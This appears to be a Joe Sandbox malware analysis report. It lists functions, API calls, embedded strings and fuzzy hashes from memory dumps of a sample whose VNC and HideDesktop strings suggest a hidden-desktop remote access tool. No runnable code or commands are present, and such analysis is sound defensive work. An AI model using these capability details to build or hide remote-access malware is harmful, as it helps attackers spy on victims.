                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
                                                                            • String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
                                                                            • API String ID: 1123868200-453874877
                                                                            • Opcode ID: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
                                                                            • Instruction ID: dae916a37b70fb4340c0ac184c4aefcb1f7325133404e62dc6723b62738977e3
                                                                            • Opcode Fuzzy Hash: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
                                                                            • Instruction Fuzzy Hash: 85516D22A0968385EE619F25D4502B967A0FF96B8EF080536DF8DC7795EFBCE445C700
                                                                            Function 00007FF6C2B94970 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 77threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$Thread$CloseCurrentDialogInformationInputObjectOpenParamUser
                                                                            • String ID: TextChat.cpp : !GetUserObjectInformation $TextChat.cpp : OpenInputdesktop Error $TextChat.cpp : OpenInputdesktop OK$TextChat.cpp : SelectHDESK to %s (%x) from %x$TextChat.cpp : SelectHDESK:!SetThreadDesktop
                                                                            • API String ID: 1907048692-1814171851
                                                                            • Opcode ID: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                                            • Instruction ID: c387c03e26593ed70dd2f443bea05b99e9bf61b1f15af7d7bb2defc6ff527969
                                                                            • Opcode Fuzzy Hash: 8163326f654e9061bb90f399b61091b260bb383b6dd3451fd4e367f97eeb259b
                                                                            • Instruction Fuzzy Hash: 78312C25A08A8281FB90DF61A8446B963B1FF9974EF844136DECEC7754DFBCE1158740
                                                                            Function 00007FF6C2BB5100 Relevance: 22.7, APIs: 15, Instructions: 242COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateRect$DeleteObject$Combinefree$ErrorFreeHeapLast_errnomalloc
                                                                            • String ID:
                                                                            • API String ID: 1881577244-0
                                                                            • Opcode ID: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
                                                                            • Instruction ID: e65fd1ad79f02b088b6e176cb734cd68a2ee3c4639dfee69a55570153e73a66c
                                                                            • Opcode Fuzzy Hash: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
                                                                            • Instruction Fuzzy Hash: E7A1F172A086864AEB50CF16E584BAA7765FB85B8EF105134DE8ED3B54DFB8E404C701
                                                                            Function 00007FF6C2B900D0 Relevance: 22.6, APIs: 15, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Combine$DeleteObjectRectfree$Offset$Create
                                                                            • String ID:
                                                                            • API String ID: 2677898628-0
                                                                            • Opcode ID: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                                            • Instruction ID: 78fe34d6a52c916c87afa0ff0698f9273fb652f50ea1ab9224e7ed985f563bb9
                                                                            • Opcode Fuzzy Hash: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
                                                                            • Instruction Fuzzy Hash: F1415372B14A2289EB50DFA2EC909AD3330BB85B8EB404132DF5E93B68CF68D445C340
                                                                            Function 00007FF6C2BA551D Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 293COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
                                                                            • String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 1769082246-4238595597
                                                                            • Opcode ID: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
                                                                            • Instruction ID: 81223898dff07f9e430692724ffd4a5a9b016ee549f62a99b13fd1a26d56ceac
                                                                            • Opcode Fuzzy Hash: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
                                                                            • Instruction Fuzzy Hash: 72E17B32A0869185E794CF29C458BEE7BB1EB86B8DF154032DE8D877A1CFB9E441C700
                                                                            Function 00007FF6C2BA5958 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 266COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Enter$Leave
                                                                            • String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 2801635615-1537001432
                                                                            • Opcode ID: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                                            • Instruction ID: 9849619ae6a04d670baf48b247e7190d0b4e9b3c44a141c3344e8e63b6049851
                                                                            • Opcode Fuzzy Hash: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
                                                                            • Instruction Fuzzy Hash: D0D17022A0869185EB90DF25C458BBE7BB0EB86B8EF194131CE8D877A1CFB9D445C740
                                                                            Function 00007FF6C2BD8080 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 85libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFileFreeInitializeLoadModuleNameOpenPrivateProcProfileUninitialize
                                                                            • String ID: CUPSD$CheckUserPasswordSDUni result=%i$WARNING$You selected ms-logon, but authSSP.dllwas not found.Check you installation$\authSSP.dll$vncntlm.cpp : GetProcAddress
                                                                            • API String ID: 1719662965-904825817
                                                                            • Opcode ID: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                            • Instruction ID: acb9604c1827d5d51e8d44131fef234b5c86c7c42faa081e643b7f7554e92930
                                                                            • Opcode Fuzzy Hash: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
                                                                            • Instruction Fuzzy Hash: 01415F35A08A8281FA609F25A8456F923A0FF89B9EF444532DEDDC77A5DEBCE145C700
                                                                            Function 00007FF6C2B8AB70 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF6C2B8ABD4
                                                                            • HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF6C2B8AC17
                                                                            • HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF6C2B8AC72
                                                                            • HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF6C2B8AC8A
                                                                            • HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF6C2B8ABB9
                                                                            • HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF6C2B8AC2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorInfoLastParametersSystem
                                                                            • String ID: HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x
                                                                            • API String ID: 2777246624-426764769
                                                                            • Opcode ID: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
                                                                            • Instruction ID: 29455c2af8b8327bdec4c45de4838e12529921b6310baf4bd3c61abd7b9307fc
                                                                            • Opcode Fuzzy Hash: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
                                                                            • Instruction Fuzzy Hash: 5F311D64E1868396F7A09F61A844BB527A0BF5574EF848032CECDD37A0DEBCB449C740
                                                                            Function 00007FF6C2BB11E0 Relevance: 19.6, APIs: 13, Instructions: 103windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
                                                                            • String ID:
                                                                            • API String ID: 4219907860-0
                                                                            • Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                            • Instruction ID: 13d10854f88b9f839847483b1ff35d31f5fa767cc186b162568a85ee7f563850
                                                                            • Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
                                                                            • Instruction Fuzzy Hash: 4341742261869286EB60DF25A8446AA73A0FB89BDDF005436EF8E87B54DFBCD104D750
                                                                            Function 00007FF6C2BB1AE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 114libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$Free$AddressLoadProc
                                                                            • String ID: ($GetMonitorInfoA$MonitorFromPointA$USER32
                                                                            • API String ID: 1386263645-671781545
                                                                            • Opcode ID: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                            • Instruction ID: 9a6665748258587bc6ef7c84e872a104f99f84210ef31b5e8d496816a93600c7
                                                                            • Opcode Fuzzy Hash: de9e37aab11e1b949d1bdc09dbfd75982bc7ac87204d7d26c8bfb04ef9f01631
                                                                            • Instruction Fuzzy Hash: 3841493191860286EB688F28E89533836A0EB46B9FF504531CE9DCA3D4DFFDE4459701
                                                                            Function 00007FF6C2B8B310 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wgetenv$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: CONNECT_USER$HTTP_PROXY_USER$SOCKS4_USER$SOCKS5_USER$SOCKS_USER
                                                                            • API String ID: 3057866299-2798169553
                                                                            • Opcode ID: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                                            • Instruction ID: 998f4267bc7b6790459471968162d55e35bc428006070e9cdf99b4ffdc13ee6c
                                                                            • Opcode Fuzzy Hash: a7b8bb38faf38aa79791e2a14257626f8ee9895d63d419d597d659aa22ea67ad
                                                                            • Instruction Fuzzy Hash: F331C721A1A64391ED95DF25E4911B862A0EF6574EF8C4836DF8DC67A1FFACE894C300
                                                                            Function 00007FF6C2B93A60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 72registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$CreateOpenQueryValueVersion
                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                            • API String ID: 1076069355-3579764778
                                                                            • Opcode ID: 87e8c0d61f37e34202edbdab6bff78c1ba5551bc53e556ab61ee4318769b540b
                                                                            • Instruction ID: db925aba81390d1a3c7bc51fa27e9c9b7c65110d8eb08dfe29f1b81f25fb9e5c
